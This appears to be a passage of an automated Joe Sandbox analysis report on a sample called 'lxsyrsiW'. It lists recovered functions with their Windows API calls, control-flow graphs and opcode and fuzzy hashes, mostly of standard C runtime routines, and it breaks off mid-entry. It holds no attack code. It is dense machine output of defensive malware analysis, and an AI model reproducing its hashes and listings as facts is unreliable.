                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 0c706e3b66ba7a101db3cd53c9592b531c508e952705ec37707bb99f91540c14
                                                                                                                • Instruction ID: c22336146ae1c50ddd8084a0a2d72aac50352fc94dd7634e4dedba4d2f482ad5
                                                                                                                • Opcode Fuzzy Hash: 0c706e3b66ba7a101db3cd53c9592b531c508e952705ec37707bb99f91540c14
                                                                                                                • Instruction Fuzzy Hash: 8C31D4749012289BCB61DF64DD887CDBBB8EF08310F6041EAE40DA7250EB709F858F49
                                                                                                                Function 10043F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002,00000000,?,10042038,00000003), ref: 10043F5E
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002,00000000,?,10042038,00000003), ref: 10043F65
                                                                                                                • ExitProcess.KERNEL32 ref: 10043F77
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: d901a480580f88cf6ed5e805247d5d7d9e09585f2d2463ed2164aa06e86e4e00
                                                                                                                • Instruction ID: 5735ef3b7e6fef01be9c5a23706bffba73639f9e7f092aed6f7edf70567c3a50
                                                                                                                • Opcode Fuzzy Hash: d901a480580f88cf6ed5e805247d5d7d9e09585f2d2463ed2164aa06e86e4e00
                                                                                                                • Instruction Fuzzy Hash: 9FE04631804948AFDF01AF68CE49A483B7AFB46382F118034F905DA032CB35ED82CA88
                                                                                                                Function 004BF794 Relevance: .1, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                • Instruction ID: 9dce6d6b8b05ab0a555f06944759f9cc391f65fca432f5fc4cfe5cd17794a38a
                                                                                                                • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                • Instruction Fuzzy Hash: 9631F3329052446ACF32A96C5C146F77B64AB62BB0F1C45F7E44C86792DB2C8C4DC2BC
                                                                                                                Function 004015D7 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                                • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535
                                                                                                                Function 10001130 Relevance: .0, Instructions: 2COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Function 100424FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2437 100424ff-10042513 2438 10042515-1004251a 2437->2438 2439 10042581-10042589 2437->2439 2438->2439 2440 1004251c-10042521 2438->2440 2441 100425d0-100425e8 call 10042672 2439->2441 2442 1004258b-1004258e 2439->2442 2440->2439 2444 10042523-10042526 2440->2444 2452 100425eb-100425f2 2441->2452 2442->2441 2443 10042590-100425cd call 10042096 * 4 2442->2443 2443->2441 2444->2439 2447 10042528-10042530 2444->2447 2450 10042532-10042535 2447->2450 2451 1004254a-10042552 2447->2451 2450->2451 2456 10042537-10042549 call 10042096 call 10043073 2450->2456 2454 10042554-10042557 2451->2454 2455 1004256c-10042580 call 10042096 * 2 2451->2455 2457 100425f4-100425f8 2452->2457 2458 10042611-10042615 2452->2458 2454->2455 2460 10042559-1004256b call 10042096 call 10043171 2454->2460 2455->2439 2456->2451 2465 1004260e 2457->2465 2466 100425fa-100425fd 2457->2466 2461 10042617-1004261c 2458->2461 2462 1004262d-10042639 2458->2462 2460->2455 2469 1004261e-10042621 2461->2469 2470 1004262a 2461->2470 2462->2452 2472 1004263b-10042648 call 10042096 2462->2472 2465->2458 2466->2465 2474 100425ff-1004260d call 10042096 * 2 2466->2474 2469->2470 2479 10042623-10042629 call 10042096 2469->2479 2470->2462 2474->2465 2479->2470
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10042543
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043090
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430A2
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430B4
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430C6
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430D8
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430EA
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430FC
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 1004310E
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043120
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043132
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043144
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043156
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043168
                                                                                                                • _free.LIBCMT ref: 10042538
                                                                                                                  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?), ref: 100420AC
                                                                                                                  • Part of subcall function 10042096: GetLastError.KERNEL32(?,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?,?), ref: 100420BE
                                                                                                                • _free.LIBCMT ref: 1004255A
                                                                                                                • _free.LIBCMT ref: 1004256F
                                                                                                                • _free.LIBCMT ref: 1004257A
                                                                                                                • _free.LIBCMT ref: 1004259C
                                                                                                                • _free.LIBCMT ref: 100425AF
                                                                                                                • _free.LIBCMT ref: 100425BD
                                                                                                                • _free.LIBCMT ref: 100425C8
                                                                                                                • _free.LIBCMT ref: 10042600
                                                                                                                • _free.LIBCMT ref: 10042607
                                                                                                                • _free.LIBCMT ref: 10042624
                                                                                                                • _free.LIBCMT ref: 1004263C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: eb483edfe315963564988db57b243b2e66e910094b7b3801ac9d68e49e928187
                                                                                                                • Instruction ID: 80d4f76ae52979dc855e83d83be597b6f0f833f5ce5778967f8c048775cc22ba
                                                                                                                • Opcode Fuzzy Hash: eb483edfe315963564988db57b243b2e66e910094b7b3801ac9d68e49e928187
                                                                                                                • Instruction Fuzzy Hash: 7F313BB1B007019BEB21DA34D845B56B3E9FF00291FB14439E45AD7152DE71FD90CB28
                                                                                                                Function 10041A1B Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2494 10041a1b-10041a36 2495 10041a48 2494->2495 2496 10041a38-10041a46 RtlDecodePointer 2494->2496 2497 10041a4d-10041a53 2495->2497 2496->2497 2498 10041a59 2497->2498 2499 10041b7a-10041b7d 2497->2499 2500 10041b6e 2498->2500 2501 10041a5f-10041a62 2498->2501 2502 10041b7f-10041b82 2499->2502 2503 10041bda 2499->2503 2504 10041b70-10041b75 2500->2504 2505 10041b0f-10041b12 2501->2505 2506 10041a68 2501->2506 2508 10041b84-10041b87 2502->2508 2509 10041bce 2502->2509 2507 10041be1 2503->2507 2514 10041c23-10041c32 call 10044c0d 2504->2514 2512 10041b14-10041b17 2505->2512 2513 10041b65-10041b6c 2505->2513 2515 10041afc-10041b0a 2506->2515 2516 10041a6e-10041a73 2506->2516 2517 10041be8-10041c11 2507->2517 2510 10041bc2 2508->2510 2511 10041b89-10041b8c 2508->2511 2509->2503 2510->2509 2520 10041bb6 2511->2520 2521 10041b8e-10041b91 2511->2521 2522 10041b5c-10041b63 2512->2522 2523 10041b19-10041b1c 2512->2523 2525 10041b29-10041b57 2513->2525 2515->2517 2518 10041a75-10041a78 2516->2518 2519 10041aed-10041af7 2516->2519 2541 10041c13-10041c18 call 100415d3 2517->2541 2542 10041c1e-10041c21 2517->2542 2526 10041ae4-10041aeb 2518->2526 2527 10041a7a-10041a7d 2518->2527 2519->2517 2520->2510 2529 10041b93-10041b98 2521->2529 2530 10041baa 2521->2530 2522->2507 2523->2514 2531 10041b22 2523->2531 2525->2542 2538 10041a8f-10041abf 2526->2538 2533 10041ad5-10041adf 2527->2533 2534 10041a7f-10041a82 2527->2534 2535 10041ba3-10041ba8 2529->2535 2536 10041b9a-10041b9d 2529->2536 2530->2520 2531->2525 2533->2517 2534->2514 2539 10041a88 2534->2539 2535->2504 2536->2514 2536->2535 2538->2542 2548 10041ac5-10041ad0 call 100415d3 2538->2548 2539->2538 2541->2542 2542->2514 2548->2542
                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 10041A3E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecodePointer
                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                • Opcode ID: 1639ca3591a54545d13dce2ff40711b127de3502d7f4a8cfba1bd329ff851959
                                                                                                                • Instruction ID: 496ffa460dd9b2aa12352d540c64a8b2ca119fd6790351c66ebdc72429a88fe2
                                                                                                                • Opcode Fuzzy Hash: 1639ca3591a54545d13dce2ff40711b127de3502d7f4a8cfba1bd329ff851959
                                                                                                                • Instruction Fuzzy Hash: 2D514970A01A0ADBDB00DFA4EA881EDBBB1FF49350F7141A5E881E7254DB758D24CB9D
                                                                                                                Function 10047B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2551 10047b9c-10047bf9 GetConsoleCP 2552 10047d3c-10047d4e call 10044c0d 2551->2552 2553 10047bff-10047c1b 2551->2553 2554 10047c36-10047c47 call 1004304d 2553->2554 2555 10047c1d-10047c34 2553->2555 2563 10047c6d-10047c6f 2554->2563 2564 10047c49-10047c4c 2554->2564 2557 10047c70-10047c7f call 10047937 2555->2557 2557->2552 2565 10047c85-10047ca5 WideCharToMultiByte 2557->2565 2563->2557 2566 10047c52-10047c64 call 10047937 2564->2566 2567 10047d13-10047d32 2564->2567 2565->2552 2568 10047cab-10047cc1 WriteFile 2565->2568 2566->2552 2574 10047c6a-10047c6b 2566->2574 2567->2552 2570 10047d34-10047d3a GetLastError 2568->2570 2571 10047cc3-10047cd4 2568->2571 2570->2552 2571->2552 2573 10047cd6-10047cda 2571->2573 2575 10047cdc-10047cfa WriteFile 2573->2575 2576 10047d08-10047d0b 2573->2576 2574->2565 2575->2570 2577 10047cfc-10047d00 2575->2577 2576->2553 2578 10047d11 2576->2578 2577->2552 2579 10047d02-10047d05 2577->2579 2578->2552 2579->2576
                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10048311,?,00000000,?,00000000,00000000), ref: 10047BDE
                                                                                                                • __fassign.LIBCMT ref: 10047C59
                                                                                                                • __fassign.LIBCMT ref: 10047C74
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10047C9A
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10048311,00000000,?,?,?,?,?,?,?,?,?,10048311,?), ref: 10047CB9
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10048311,00000000,?,?,?,?,?,?,?,?,?,10048311,?), ref: 10047CF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
                                                                                                                • Opcode ID: dcd95d2b4e03d47bbff43478d85e059036efca89b2c4bb4c1e5dbd75402f611f
                                                                                                                • Instruction ID: f2816552115443c7229bfc077955cc8e048ca3a97d87d7fdeeb7cf75c4f0abcf
                                                                                                                • Opcode Fuzzy Hash: dcd95d2b4e03d47bbff43478d85e059036efca89b2c4bb4c1e5dbd75402f611f
                                                                                                                • Instruction Fuzzy Hash: E151EB70D002459FDB10CFA4CC85AEEBBF5FF09300F24456AE959E7291D770A951CBA5
                                                                                                                Function 10043216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100431DA: _free.LIBCMT ref: 10043203
                                                                                                                • _free.LIBCMT ref: 10043264
                                                                                                                  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?), ref: 100420AC
                                                                                                                  • Part of subcall function 10042096: GetLastError.KERNEL32(?,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?,?), ref: 100420BE
                                                                                                                • _free.LIBCMT ref: 1004326F
                                                                                                                • _free.LIBCMT ref: 1004327A
                                                                                                                • _free.LIBCMT ref: 100432CE
                                                                                                                • _free.LIBCMT ref: 100432D9
                                                                                                                • _free.LIBCMT ref: 100432E4
                                                                                                                • _free.LIBCMT ref: 100432EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                • Instruction ID: de2e8023f7193a4c2a5ffe9969e1dc1f932c9f33873d0de85b413c360879defd
                                                                                                                • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                • Instruction Fuzzy Hash: 90112E76A40B04AAD630EBB0CC07FCB77DCEF45710F909836BA9EE6063DA75B5448658
                                                                                                                Function 100444E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2617 100444e9-10044502 2618 10044504-10044514 call 100449fc 2617->2618 2619 10044518-1004451d 2617->2619 2618->2619 2629 10044516 2618->2629 2621 1004451f-10044527 2619->2621 2622 1004452a-1004454e MultiByteToWideChar 2619->2622 2621->2622 2623 10044554-10044560 2622->2623 2624 100446e1-100446f4 call 10044c0d 2622->2624 2626 100445b4 2623->2626 2627 10044562-10044573 2623->2627 2633 100445b6-100445b8 2626->2633 2630 10044575-10044584 call 10044da0 2627->2630 2631 10044592-100445a3 call 100432fa 2627->2631 2629->2619 2636 100446d6 2630->2636 2644 1004458a-10044590 2630->2644 2631->2636 2645 100445a9 2631->2645 2633->2636 2637 100445be-100445d1 MultiByteToWideChar 2633->2637 2638 100446d8-100446df call 1004361c 2636->2638 2637->2636 2641 100445d7-100445f2 call 10042317 2637->2641 2638->2624 2641->2636 2649 100445f8-100445ff 2641->2649 2648 100445af-100445b2 2644->2648 2645->2648 2648->2633 2650 10044601-10044606 2649->2650 2651 10044639-10044645 2649->2651 2650->2638 2652 1004460c-1004460e 2650->2652 2653 10044647-10044658 2651->2653 2654 10044691 2651->2654 2652->2636 2655 10044614-1004462e call 10042317 2652->2655 2657 10044673-10044684 call 100432fa 2653->2657 2658 1004465a-10044669 call 10044da0 2653->2658 2656 10044693-10044695 2654->2656 2655->2638 2670 10044634 2655->2670 2661 10044697-100446b0 call 10042317 2656->2661 2662 100446cf-100446d5 call 1004361c 2656->2662 2657->2662 2669 10044686 2657->2669 2658->2662 2673 1004466b-10044671 2658->2673 2661->2662 2675 100446b2-100446b9 2661->2675 2662->2636 2674 1004468c-1004468f 2669->2674 2670->2636 2673->2674 2674->2656 2676 100446f5-100446fb 2675->2676 2677 100446bb-100446bc 2675->2677 2678 100446bd-100446cd WideCharToMultiByte 2676->2678 2677->2678 2678->2662 2679 100446fd-10044704 call 1004361c 2678->2679 2679->2638
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,1004473A,?,?,00000000), ref: 10044543
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1004473A,?,?,00000000,?,?,?), ref: 100445C9
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100446C3
                                                                                                                • __freea.LIBCMT ref: 100446D0
                                                                                                                  • Part of subcall function 100432FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 1004332C
                                                                                                                • __freea.LIBCMT ref: 100446D9
                                                                                                                • __freea.LIBCMT ref: 100446FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: cb6e73521219ac1604200574bf9ea775aca78d226025bf774f37d35ceb54ce96
                                                                                                                • Instruction ID: 0c83146eb8352b41d9e4e6cd2498997cea625c79840de532b16061f18187481b
                                                                                                                • Opcode Fuzzy Hash: cb6e73521219ac1604200574bf9ea775aca78d226025bf774f37d35ceb54ce96
                                                                                                                • Instruction Fuzzy Hash: 1651BFB2A00616ABEB15CE64CC81EAF77A9EB45690F374638FC04D7190EF74EC90C659
                                                                                                                Function 1004185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2682 1004185b-1004186f GetLastError 2683 10041871-1004187b call 10042206 2682->2683 2684 1004187d-1004188f call 10042039 2682->2684 2683->2684 2689 100418c6-100418d1 SetLastError 2683->2689 2690 10041891 2684->2690 2691 1004189a-100418a8 call 1004225c 2684->2691 2693 10041892-10041898 call 10042096 2690->2693 2697 100418ad-100418c4 call 10041797 call 10042096 2691->2697 2698 100418aa-100418ab 2691->2698 2699 100418d2-100418de SetLastError call 10041ff6 2693->2699 2697->2689 2697->2699 2698->2693
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                • Opcode ID: 426a1b214f449fbabe24d79378952f512cb14b6f799e9beb475b7c955572f610
                                                                                                                • Instruction ID: f202c0acdb81aa64a5eae758d42c08751bfe1b6fdc2620f7feb9e63caca283c5
                                                                                                                • Opcode Fuzzy Hash: 426a1b214f449fbabe24d79378952f512cb14b6f799e9beb475b7c955572f610
                                                                                                                • Instruction Fuzzy Hash: DDF0CD3A7006117BE311D7355D46EAB16DADFC27A1F71013DF914E2192FF659C42411C
                                                                                                                Function 10043FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10043F73,00000003,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002), ref: 10043FE2
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10043FF5
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10043F73,00000003,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002,00000000), ref: 10044018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 517e1f112879d4fb75ed8d696a5f771f380b911c2c6cfb392c0c0a3e770559a1
                                                                                                                • Instruction ID: 4fe64a5819f759115b05a1def77681a479560721cc04137916b3a3784b8cf7e2
                                                                                                                • Opcode Fuzzy Hash: 517e1f112879d4fb75ed8d696a5f771f380b911c2c6cfb392c0c0a3e770559a1
                                                                                                                • Instruction Fuzzy Hash: 0AF0C230900128BBEB11DF90CD49BAEBFB9EF45351F110068F905E2160CF749E84DB98
                                                                                                                Function 100418DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000008,?,?,100415D8,10043CBB,?,10041D2A,?,?,00000000), ref: 100418E4
                                                                                                                • _free.LIBCMT ref: 10041919
                                                                                                                • _free.LIBCMT ref: 10041940
                                                                                                                • SetLastError.KERNEL32(00000000,?,10041D2A,?,?,00000000), ref: 1004194D
                                                                                                                • SetLastError.KERNEL32(00000000,?,10041D2A,?,?,00000000), ref: 10041956
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                • Opcode ID: 27218d39151a1fb8a4c47cba335538c8ab679a51337d85444a7a2546c0b347db
                                                                                                                • Instruction ID: 298917bf2bf5f65f3e66c2e4742617b20304a4e795e88abd634da0b038b75747
                                                                                                                • Opcode Fuzzy Hash: 27218d39151a1fb8a4c47cba335538c8ab679a51337d85444a7a2546c0b347db
                                                                                                                • Instruction Fuzzy Hash: C701F43B3046127BE312D7709D95AAB16EEDBC62B47720139FA14E2253FA758C82402C
                                                                                                                Function 10043171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 10043189
                                                                                                                  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?), ref: 100420AC
                                                                                                                  • Part of subcall function 10042096: GetLastError.KERNEL32(?,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?,?), ref: 100420BE
                                                                                                                • _free.LIBCMT ref: 1004319B
                                                                                                                • _free.LIBCMT ref: 100431AD
                                                                                                                • _free.LIBCMT ref: 100431BF
                                                                                                                • _free.LIBCMT ref: 100431D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 7391c506bee86009a89ae6c8a61ca8a829215e2667859e320e20c9ec1ca5e9ca
                                                                                                                • Instruction ID: 9ba6a6cbad0a28da5a5dfaf1b7a119aeefcbeabe35988339130f8bcf59d7326a
                                                                                                                • Opcode Fuzzy Hash: 7391c506bee86009a89ae6c8a61ca8a829215e2667859e320e20c9ec1ca5e9ca
                                                                                                                • Instruction Fuzzy Hash: 50F06DB16402109BD674DB68E9C2C1B73EAFA402507B09829F44AD7622CB70FC808A68
                                                                                                                Function 100434FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 1004354C
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100435D5
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100435E7
                                                                                                                • __freea.LIBCMT ref: 100435F0
                                                                                                                  • Part of subcall function 100432FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 1004332C
                                                                                                                Memory Dump Source
